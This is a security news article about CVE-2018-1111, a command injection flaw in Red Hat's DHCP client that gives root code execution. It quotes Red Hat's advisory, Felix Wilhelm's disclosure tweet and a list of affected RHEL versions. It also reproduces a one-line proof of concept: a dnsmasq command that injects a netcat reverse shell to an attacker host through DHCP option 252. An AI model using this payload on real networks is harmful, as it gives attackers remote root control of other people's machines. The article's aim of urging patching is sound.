Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.
A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.
Red Hat has announced a critical vulnerability in its DHCP client and while it doesn’t have a brand name it does have a Tweetable proof-of-concept.
Discovered by Googler Felix Wilhelm, CVE-2018-1111 is a command injection bug in the Red Hat Enterprise Linux and derivative DHCP clients.
Wilhelm Tweeted: “CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.”
Here, IN a Tweet from Barkın Kılıç, is the PoC:
#CVE-2018-1111 tweetable PoC 🙂 dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option=”252,x’&nc -e /bin/bash 10.1.1.1 1337 #” cc: @cnbrkbolat
Red Hat explained that “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.”
Here’s the full list of affected RHEL versions: Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).